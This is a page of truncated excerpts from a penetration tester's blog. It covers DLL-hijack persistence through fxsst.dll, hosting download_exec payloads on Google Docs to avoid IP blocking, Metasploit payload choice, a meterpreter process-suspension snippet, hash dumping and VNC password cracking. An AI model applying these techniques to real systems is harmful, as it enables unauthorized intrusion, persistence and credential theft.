Nick Harbour wrote a post on Mandiants blog about some Malware that was using a dll called ‘fxsst.dll’ to hide and stay persistent on a system. The DLL is used by Windows when it is acting as a Fax server (anyone still do that?). He mentions some very interesting points: The DLL gets loaded at login by Explorer The DLL exists in System32 but is looked for in Windows first Explorer doesn’t try to use anything inside of it via exports unless the system is acting as a fax server (aka safe to put a pretty bland DLL there) I thought… no it couldn’t be that simple… lets see:
In Part 1 I gave an example I used at CCDC with the single ‘windows/download_exec’. One of the down sides of that payload is you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple months ago) allowed people to upload ‘anything’ to Google docs. And you can then share these files publicly. Probably already see where I’m going with this, but here are some steps to get it going, first upload your malicious binary (not the dropper ‘windows/download_exec’, but the file it needs to execute).
Payload selection is something that rarely gets talked about in detail. Most PoCs just use calc.exe, netcat, or some kind of socket. The vast majority of Metasploit tutorials, videos and documentation use the _windows/meterpreter/reverse_tcp_ payload which is only one of 224 possible payloads. Here is a little disclaimer: While the payloads in Metasploit don’t get updated as much as other parts of Metasploit, this is a point in time documentation of them (June 23, 2011) and the payloads available in Metasploit are constantly changing.
Just a follow up to my previous post. One of the things that sets that method apart is the fact that the suspension (once the DLL injection occurs) comes from within the process, and it suspends all the child processes as well. Another way you can do this without the injection is just sending a suspend to all the threads in the process. pid = 2980 targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS) targetprocess.
Recently Didier Stevens wrote ‘Suspender.dll’ which is a DLL that will suspend a process and all of it’s child processes after a delay. 60 seconds is it’s default but you can rename the DLL to add a number (as such ‘Suspender10.dll’ for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/ Jonathan Cran and I had the same idea, as I’m sure many others did as well.
When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:
Original Post: http://blog.nvisiumsecurity.com/2011/04/exploitable-mobile-app-challenge-now.html You can read the details on the above link, but it boils down to you make an application for iPhone or Android. You make it vulnerable to X,Y,Z types of flaws, you win a 32gb iPad or a Motorola Xoom. Added bonus, all the apps get submitted to OWASP for people to learn Mobile security.
This is probably the most practical and applicable IPv6 talk I’ve ever seen. Amazing job. Rick Hayes - Assessing and Pen-Testing IPv6 Networks from Adrian Crenshaw on Vimeo.
I felt left out… That is all..
Chris Gates wrote a blog post about the ‘getvncpw’ meterpreter script. I ran into the same issue on Penetration Tests in the past but didn’t know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn’t get a chance to.